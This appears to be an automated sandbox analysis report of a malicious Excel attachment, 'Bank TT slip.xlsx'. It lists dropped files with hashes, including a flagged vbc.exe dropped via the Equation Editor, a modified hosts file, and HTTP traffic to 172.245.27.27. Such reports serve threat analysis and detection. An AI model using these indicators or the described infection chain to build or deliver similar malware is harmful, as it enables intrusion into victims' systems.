                          Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A240C8.png

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                          Category:dropped
                          Size (bytes):2647
                          Entropy (8bit):7.8900124483490135
                          Encrypted:false
                          SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                          MD5:E46357D82EBC866EEBDA98FA8F94B385
                          SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                          SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                          SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                          Malicious:false
                          Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1A95BC.jpeg

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                          Category:dropped
                          Size (bytes):4396
                          Entropy (8bit):7.884233298494423
                          Encrypted:false
                          SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                          MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                          SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                          SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                          SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                          Malicious:false
                          Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D45E828D.png

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):5396
                          Entropy (8bit):7.915293088075047
                          Encrypted:false
                          SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                          MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                          SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                          SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                          SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                          Malicious:false
                          Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE3E0A16.png

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):5396
                          Entropy (8bit):7.915293088075047
                          Encrypted:false
                          SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                          MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                          SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                          SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                          SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                          Malicious:false
                          Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD51471F.png

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):11303
                          Entropy (8bit):7.909402464702408
                          Encrypted:false
                          SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                          MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                          SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                          SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                          SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                          Malicious:false
                          Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

                          C:\Users\user\AppData\Local\Temp\~DF7445FC000D331A6E.TMP

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\~DFBAFAEA404D417564.TMP

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:CDFV2 Encrypted
                          Category:dropped
                          Size (bytes):53760
                          Entropy (8bit):7.842540370584659
                          Encrypted:false
                          SSDEEP:768:kqmuNsZ9NhvSSQDqAAtBMTB/FwedrZKvN6lEq+2+SVj+PAaBQeqruUlEWymcfl/q:kqhq5L0qBM9SML+SVjcHBtH9JIN
                          MD5:2391E6AA319CBA9248661674AC5F2105
                          SHA1:BBDB700FD74488CC9F3F3E4D66DE6B1321EE94B0
                          SHA-256:18FA3E8547F1B76B8A53B1169C4B3ED78F1A3EFB77163E0698AE3B1FAF7EFB71
                          SHA-512:973ACE3991EB226F6E6242316860EA1803A6CC192F6006951E3DB1505503609C39B1F9C8CEDB13C74A39CE0998CD452440975DB2FC3B76D2E8A682CA433BF718
                          Malicious:false
                          Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...............................................................................

                          C:\Users\user\AppData\Local\Temp\~DFC691B0AA0E02487B.TMP

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\~DFDAC05FDF80BA3ECF.TMP

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\Desktop\~$Bank TT slip.xlsx

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):165
                          Entropy (8bit):1.4377382811115937
                          Encrypted:false
                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                          MD5:797869BB881CFBCDAC2064F92B26E46F
                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                          Malicious:true
                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                          C:\Users\Public\vbc.exe

                          Download File
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):833024
                          Entropy (8bit):7.018221482722969
                          Encrypted:false
                          SSDEEP:12288:7HE2ISZ5m4fuOjUTPXmkHz/b9m+DhLrRvoXSf+bnl8tTac2aVzBQXOCmxqogCSsV:b3NUXmkTjZFRvoCmblML
                          MD5:F18604D5FC3E2930E85C403E0E80A459
                          SHA1:AA0517C10C333F9A9A64EBA154EA915464EBF2BB
                          SHA-256:46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
                          SHA-512:C39BD01BCA62779434B0508BC66972CD7030153469F631B425E1B77AF59FD7DB1A26A837EA2B7440C9F93CD538C43C2F2005EBCF34B982C03CEED71A4C3B685C
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 46%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|b..............P.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............?...........f...............................................*..(#...*&..($....*.s%........s&........s'........s(........s)........*Z........o1...........*&..(2....*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{....(...+}.....{....+.*j..{..

                          C:\Windows\System32\drivers\etc\hosts

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):835
                          Entropy (8bit):4.694294591169137
                          Encrypted:false
                          SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                          MD5:6EB47C1CF858E25486E42440074917F2
                          SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                          SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                          SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                          Malicious:true
                          Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                          Static File Info

                          General

                          File type:CDFV2 Encrypted
                          Entropy (8bit):7.842540370584659
                          TrID:
                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                          File name:Bank TT slip.xlsx
                          File size:53760
                          MD5:2391e6aa319cba9248661674ac5f2105
                          SHA1:bbdb700fd74488cc9f3f3e4d66de6b1321ee94b0
                          SHA256:18fa3e8547f1b76b8a53b1169c4b3ed78f1a3efb77163e0698ae3b1faf7efb71
                          SHA512:973ace3991eb226f6e6242316860ea1803a6cc192f6006951e3db1505503609c39b1f9c8cedb13c74a39ce0998cd452440975db2fc3b76d2e8a682ca433bf718
                          SSDEEP:768:kqmuNsZ9NhvSSQDqAAtBMTB/FwedrZKvN6lEq+2+SVj+PAaBQeqruUlEWymcfl/q:kqhq5L0qBM9SML+SVjcHBtH9JIN
                          TLSH:F133BE6B63B6A1ACD83E71BBF113CD36CB0E7D21D20DD9091811B24D84BE8568B527F6
                          File Content Preview:........................>......................................................................................................................................................................................................................................

                          File Icon

                          Icon Hash:e4e2aa8aa4b4bcb4

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          May 13, 2022 16:58:18.558007956 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.672775984 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.672893047 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.682598114 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.802066088 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.802112103 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.802135944 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.802158117 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.802159071 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.802184105 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.802185059 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.802189112 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.802210093 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.802232981 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.802233934 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.802238941 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.802253962 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.802264929 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.802274942 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.802287102 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.802298069 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.802306890 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.802340031 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.849416018 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.916913033 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.916958094 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.916985035 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917009115 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917035103 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917059898 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917061090 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917084932 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917085886 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917089939 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917109966 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917110920 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917130947 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917136908 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917148113 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917161942 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917170048 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917185068 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917198896 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917210102 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917218924 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917234898 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917251110 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917258024 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917269945 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917283058 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917299032 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917306900 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917320013 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917331934 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917339087 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917355061 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917370081 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917380095 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917387962 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917404890 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:18.917417049 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.917435884 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:18.924132109 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032015085 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032058954 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032084942 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032097101 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032114983 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032125950 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032143116 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032144070 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032155991 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032172918 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032181978 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032201052 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032207966 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032228947 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032238960 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032257080 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032263994 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032284975 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032298088 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032311916 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032334089 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032366991 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032375097 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032392979 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032402039 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032418966 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032426119 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032445908 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032452106 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032471895 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032497883 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032510042 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032519102 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032545090 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032552004 CEST4917180192.168.2.22172.245.27.27
                          May 13, 2022 16:58:19.032569885 CEST8049171172.245.27.27192.168.2.22
                          May 13, 2022 16:58:19.032577991 CEST4917180192.168.2.22172.245.27.27

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          May 13, 2022 16:59:58.960202932 CEST5586853192.168.2.228.8.8.8
                          May 13, 2022 16:59:58.979049921 CEST53558688.8.8.8192.168.2.22

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
